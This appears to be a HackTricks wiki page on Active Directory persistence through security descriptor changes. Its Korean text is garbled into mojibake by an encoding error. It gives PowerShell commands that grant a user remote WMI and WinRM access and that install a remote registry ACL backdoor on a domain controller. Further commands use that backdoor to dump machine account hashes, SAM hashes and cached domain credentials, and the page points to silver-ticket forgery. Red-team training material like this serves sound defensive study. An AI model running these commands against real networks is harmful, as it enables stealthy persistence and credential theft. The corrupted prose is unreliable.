Security Descriptors

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

Security Descriptors

From the docs: Security Descriptor Definition Language (SDDL)๋Š” ๋ณด์•ˆ ์„ค๋ช…์ž๋ฅผ ์„ค๋ช…ํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋˜๋Š” ํ˜•์‹์„ ์ •์˜ํ•ฉ๋‹ˆ๋‹ค. SDDL์€ DACL ๋ฐ SACL์— ๋Œ€ํ•ด ACE ๋ฌธ์ž์—ด์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

๋ณด์•ˆ ์„ค๋ช…์ž๋Š” ๊ฐ์ฒด๊ฐ€ ๊ฐ์ฒด์— ๋Œ€ํ•ด ๊ฐ€์ง„ ๊ถŒํ•œ์„ ์ €์žฅํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. ๊ฐ์ฒด์˜ ๋ณด์•ˆ ์„ค๋ช…์ž์— ์กฐ๊ธˆ๋งŒ ๋ณ€๊ฒฝ์„ ๊ฐ€ํ•  ์ˆ˜ ์žˆ๋‹ค๋ฉด, ํŠน๊ถŒ ๊ทธ๋ฃน์˜ ๊ตฌ์„ฑ์›์ด ๋  ํ•„์š” ์—†์ด ํ•ด๋‹น ๊ฐ์ฒด์— ๋Œ€ํ•œ ๋งค์šฐ ํฅ๋ฏธ๋กœ์šด ๊ถŒํ•œ์„ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋”ฐ๋ผ์„œ ์ด ์ง€์†์„ฑ ๊ธฐ์ˆ ์€ ํŠน์ • ๊ฐ์ฒด์— ๋Œ€ํ•ด ํ•„์š”ํ•œ ๋ชจ๋“  ๊ถŒํ•œ์„ ์–ป๋Š” ๋Šฅ๋ ฅ์— ๊ธฐ๋ฐ˜ํ•˜์—ฌ, ์ผ๋ฐ˜์ ์œผ๋กœ ๊ด€๋ฆฌ์ž ๊ถŒํ•œ์ด ํ•„์š”ํ•œ ์ž‘์—…์„ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ค๋‹ˆ๋‹ค.

Access to WMI

์‚ฌ์šฉ์ž์—๊ฒŒ ์›๊ฒฉ WMI ์‹คํ–‰์— ๋Œ€ํ•œ ์•ก์„ธ์Šค๋ฅผ ๋ถ€์—ฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค using this:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc โ€“namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcโ€“namespace 'root\cimv2' -Remove -Verbose #Remove

WinRM ์ ‘๊ทผ

์‚ฌ์šฉ์ž์—๊ฒŒ winrm PS ์ฝ˜์†”์— ๋Œ€ํ•œ ์ ‘๊ทผ ๊ถŒํ•œ ๋ถ€์—ฌ ์ด ๋ฐฉ๋ฒ•์„ ์‚ฌ์šฉํ•˜์—ฌ:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

ํ•ด์‹œ ์›๊ฒฉ ์ ‘๊ทผ

๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ ‘๊ทผํ•˜๊ณ  ํ•ด์‹œ ๋คํ”„๋ฅผ ์ƒ์„ฑํ•˜์—ฌ Reg ๋ฐฑ๋„์–ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ DAMP, ์–ธ์ œ๋“ ์ง€ ์ปดํ“จํ„ฐ์˜ ํ•ด์‹œ, SAM ๋ฐ ์ปดํ“จํ„ฐ์˜ ๋ชจ๋“  ์บ์‹œ๋œ AD ์ž๊ฒฉ ์ฆ๋ช…์„ ๊ฒ€์ƒ‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ, ์ด๋Š” ๋„๋ฉ”์ธ ์ปจํŠธ๋กค๋Ÿฌ ์ปดํ“จํ„ฐ์— ๋Œ€ํ•œ ์ผ๋ฐ˜ ์‚ฌ์šฉ์ž์—๊ฒŒ ์ด ๊ถŒํ•œ์„ ๋ถ€์—ฌํ•˜๋Š” ๋ฐ ๋งค์šฐ ์œ ์šฉํ•ฉ๋‹ˆ๋‹ค:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

์‹ค๋ฒ„ ํ‹ฐ์ผ“๋ฅผ ํ™•์ธํ•˜์—ฌ ๋„๋ฉ”์ธ ์ปจํŠธ๋กค๋Ÿฌ์˜ ์ปดํ“จํ„ฐ ๊ณ„์ • ํ•ด์‹œ๋ฅผ ์–ด๋–ป๊ฒŒ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š”์ง€ ์•Œ์•„๋ณด์„ธ์š”.

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ